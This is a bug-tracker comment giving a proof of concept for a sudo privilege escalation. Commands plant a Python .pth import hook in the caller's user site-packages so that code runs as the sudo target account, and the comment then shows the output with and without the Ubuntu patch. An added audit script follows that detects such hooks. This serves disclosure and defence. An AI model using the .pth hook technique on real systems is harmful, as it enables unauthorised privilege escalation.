Comment 4 for bug 1556302

Simon Arlott (sa.me.uk) wrote:

Proof of concept:
/etc/sudoers contains:
%dns_simon ALL=(dns_zonefiles) NOPASSWD: /home/dns/zonefiles/bin/dns-reload simon

Prepare Python code to run automatically as the calling user:
$ mkdir -p "$HOME/.local/lib/python3.5/site-packages/exploit"
$ echo "import subprocess" > "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "subprocess.run(['id'])" >> "$HOME/.local/lib/python3.5/site-packages/exploit/__init__.py"
$ echo "import exploit" > "$HOME/.local/lib/python3.5/site-packages/exploit.pth"

Calling user credentials:
$ id
uid=1001(simon) gid=1001(simon) groups=1001(simon),100(users),1007(dns_simon)

Exploit script executing with the called user's credentials:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
uid=999(dns_zonefiles) gid=995(dns_zonefiles) groups=995(dns_zonefiles)

Without the Ubuntu patch:
$ sudo -u dns_zonefiles /home/dns/zonefiles/bin/dns-reload simon
Processing example.com...
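
Added example, not part of the comment above and not code from sudo or Ubuntu: the proof of concept depends on Python's `site` module executing `.pth` lines that begin with `import`, read from a user site-packages directory owned by an account other than the one running the interpreter. This sketch checks a directory for both conditions; the function names and the constructed sample directory are hypothetical.

```python
import os
import tempfile


def executable_pth_lines(site_dir):
    """Return (file, line number, text) for each .pth line the site module would exec."""
    findings = []
    if not os.path.isdir(site_dir):
        return findings
    for name in sorted(os.listdir(site_dir)):
        if not name.endswith(".pth"):
            continue
        path = os.path.join(site_dir, name)
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                # site.addpackage() exec()s lines starting with "import " or
                # "import\t"; other non-comment lines only extend sys.path.
                if line.startswith(("import ", "import\t")):
                    findings.append((name, lineno, line.rstrip()))
    return findings


def foreign_owner(site_dir, euid=None):
    """True when site_dir is owned by a uid other than the one loading it."""
    euid = os.geteuid() if euid is None else euid
    return os.stat(site_dir).st_uid != euid


def audit(site_dir, euid=None):
    """Combine both checks for one existing site-packages directory."""
    return {"dir": site_dir,
            "foreign_owner": foreign_owner(site_dir, euid),
            "exec_lines": executable_pth_lines(site_dir)}


def build_sample():
    """Constructed sample: one path-only .pth file and one with an executable line."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "paths.pth"), "w") as fh:
        fh.write("# comment\n./vendor\n")
    with open(os.path.join(d, "exploit.pth"), "w") as fh:
        fh.write("import exploit\n")
    return d


if __name__ == "__main__":
    import site
    user_site = site.getusersitepackages()
    if os.path.isdir(user_site):
        print(audit(user_site))
    # Pretend a different account is loading the sample directory.
    print(audit(build_sample(), euid=os.geteuid() + 1))
```

Run as the target account of a sudoers rule (for example under `sudo -u`), a result with `foreign_owner` set to true means the interpreter is resolving its user site directory inside another user's home.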